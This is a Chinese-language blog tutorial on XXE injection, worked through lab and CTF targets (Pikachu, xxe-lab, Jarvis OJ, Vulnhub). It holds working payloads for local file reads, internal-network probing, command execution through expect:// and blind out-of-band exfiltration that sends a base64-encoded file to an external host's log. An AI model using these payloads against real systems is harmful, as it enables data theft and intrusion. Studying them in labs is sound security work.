当前位置: 首页 > news >正文

WEB漏洞原理之---【XMLXXE利用检测绕过】

文章目录

    • 1、概述
      • 1.1、XML概念
      • 1.2、XML与HTML的主要差异
      • 1.3、XML代码示例
    • 2、靶场演示
      • 2.1、Pikachu靶场--XML数据传输测试
        • 玩法-1-读取文件
        • 玩法-2-内网探针或攻击内网应用(触发漏洞地址)
        • 玩法-3-RCE
        • 引入外部实体DTD
        • 无回显-读取文件
          • 开启phpstudy--apache日志
    • 3、XXE绕过
    • 4、XXE检测
      • 4.1、xxe-lab靶场
      • 4.2、CTF-Jarvis-OJ-Web-XXE
      • 4.3、Vulnhub/XXE Lab: 1
    • 5、XXEinjection工具
    • 6、XXE安全防御

1、概述

1.1、XML概念

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。

XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害

XXE是XML的一个漏洞


XXE产生根本原因:网站接受XML数据,没有对xml进行过滤


1.2、XML与HTML的主要差异

XML被设计为传输和存储数据,其焦点是数据的内容。

HTML被设计用来显示数据,其焦点是数据的外观。

HTML旨在**显示信息,而XML旨在传输信息**。

1.3、XML代码示例

<!--文档类型定义-->
<!DOCTYPE note [	<!--定义此文档时note类型的文档-->
<!ELEMENT note (to,from,heading,body)>	<!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)>			<!--定义to元素为"#PCDATA"类型-->
<!ELEMENT from (#PCDATA)>		<!--定义from元素为"#PCDATA"类型-->
<!ELEMENT head (#PCDATA)>		<!--定义head元素为"#PCDATA"类型-->
<!ELEMENT body (#PCDATA)>		<!--定义body元素为"#PCDATA"类型-->
]]]><!--文档元素-->
<note><to>Dave</to><from>Tom</from><head>Reminder</head><body>You are a good man</body>
</note>

2、靶场演示

2.1、Pikachu靶场–XML数据传输测试

image-20230914200459665

-回显,玩法,协议,引入

image-20230914195827083

image-20230914200609514

玩法-1-读取文件

前提:读取的文件必须存在

<?xml version = "1.0"?>
<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///C:/tmp/1.txt">
]>
<x>&xxe;</x>

image-20230914200744610

玩法-2-内网探针或攻击内网应用(触发漏洞地址)
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTYTY rabbit SYSTEM "http://192.168.8.3/1.php">
]>
<x>&rabbit;</x>

上面的ip地址假设就是内网的一台服务器的ip地址。还可以进行一个端口扫描,看一下端口是否开放

如果访问的文件不存在,会显示如下图的信息

image-20230914201117180

玩法-3-RCE

该CASE是在安装expect扩展的PHP环境里执行系统命令

<?xml version = "1.0"?>
<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "expect://id">
]>
<x>&xxe;</x>

id是对于的执行的命令。实战情况比较难碰到

引入外部实体DTD
<?xml version = "1.0"?>
<!DOCTYPE test [<!ENTITY % file SYSTEM "http://127.0.0.1/evil2.dtd">%file;
]>
<x>&send;</x>

把核心 代码写入evil2.dtd内容如下:

<!ENTITY send SYSTEM "file:///C:/tmp/1.txt">

image-20230914202446789

条件:看对方的应用有没有禁用外部实体引用,这也是防御XXE的一种措施

image-20230914202506375

无回显-读取文件

先把靶场的回显代码注释掉

image-20230914204451864

<?xml version = "1.0"?>
<!DOCTYPE test [<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/tmp/1.txt"><!ENTITY % dtd SYSTEM "http://192.168.8.3:80/test.dtd">%dtd;%send;
]>#读取C:/tmp/1.txt里的内容复制给 file
#然后去请求test.dtd
  • test.dtd:
<!ENTITY % payload"<!ENTITY &#x25; send SYSTEM
'http://192.168.8.3:80/?data=%file;'>"
>
%payload;#去访问?data=上面读到的数据
开启phpstudy–apache日志

image-20230914204048719

image-20230914204207341

重启phpstudy,就有了一个access.log

image-20230914204301315

然后攻击,无回显,查看日志

image-20230914204659302

解码网站:https://www.bejson.com/enc/base64/

image-20230914204803786

3、XXE绕过

CTF XXE

4、XXE检测

4.1、xxe-lab靶场

xxe-lab靶场登录框xml数据传输测试–检查发现

靶场地址:https://github.com/c0ny1/xxe-lab

image-20230914205749442

image-20230914210810316

请求头中如下:Content-Type: application/xml;或者Content-Type: text/xml;

Payload:

<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///C:/tmp/1.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>

image-20230914211108235

4.2、CTF-Jarvis-OJ-Web-XXE

XXE安全真题复现–修改数据请求格式

地址:http://web.jarvisoj.com:9882/

image-20230914212537086

点击Go!BurpSuite拦截

数据包为json格式

image-20230914212613373

修改Content-Type

提交Payload

<?xml version="1.0"?>
<!DOCTYPE  ANY [
<!ENTITY ss SYSTEM "file:///etc/passwd">
]>
<x>&ss;</x>

image-20230914212918002

4.3、Vulnhub/XXE Lab: 1

靶场地址:XXE Lab: 1

下载地址:Download (Mirror)

image-20230914214744412

5、XXEinjection工具

XXE安全漏洞自动化注射脚本 工具

XXEinjector本身提供了非常非常丰富的操作选项,所以大家在利用XXEinjector进行渗透测试之前,请自习了解这些配置选项,以最大限度地发挥XXEinjector的功能。当然了,由于XXEinjector是基于Ruby开发的,所以Ruby运行环境就是必须的了。这里建议在kali环境下运行

工具地址:

  • https://github.com/enjoiz/XXEinjector
  • https://github.com/enjoiz/XXEinjector/archive/master.zip

工具使用:

  • https://www.cnblogs.com/bmjoker/p/9614990.html
git clone https://github.com/enjoiz/XXEinjector.git

image-20230914215810231

6、XXE安全防御

php java python 过滤及禁用

image-20230914220424275

http://www.lryc.cn/news/171529.html

相关文章:

  • element-table排序icon没有点亮
  • 传统的经典问题 Java 的 Interface 是干什么的
  • Linux 文件 目录管理
  • QT信号槽实现原理
  • 7-7 求鸡兔数量
  • CTF 全讲解:[SWPUCTF 2022 新生赛]webdog1__start
  • 聊天机器人
  • 肖sir__mysql之综合题练习__013
  • 阿里云服务器部署安装hadoop与elasticsearch踩坑笔记
  • Golang 中 int 类型和字符串类型如何相互转换?
  • **20.迭代器模式(Iterator)
  • 计算机视觉与深度学习 | 视觉里程计理论
  • Go网络请求中配置代理
  • 【ArcGIS】基本概念-矢量空间分析
  • OSCP系列靶场-Esay-Moneybox保姆级
  • [python 刷题] 128 Longest Consecutive Sequence
  • SpringMVC之JSON数据返回与异常处理机制
  • 【第四阶段】kotlin语言的定义类和field关键字学习
  • OpenResty使用漏桶算法实现限流
  • Activiti源码跟踪之模型Model操作
  • C#-WinForm-发送邮件
  • Springboot整合jdbc和Mybatis
  • 日常生活中的常用命令及操作
  • 【C++杂货铺】国庆中秋特辑——多态由浅入深详细总结
  • MongoDB基础详解
  • 解锁前端Vue3宝藏级资料 第五章 Vue 组件应用 4 ( provide 和 inject )
  • 【List篇】LinkedList 详解
  • 推动统一供应链“度量衡”,上汽大通突破传统拥抱SaaS生态
  • 蓝牙核心规范(V5.4)10.9-BLE 入门笔记之GAP
  • nginx 配置 ssl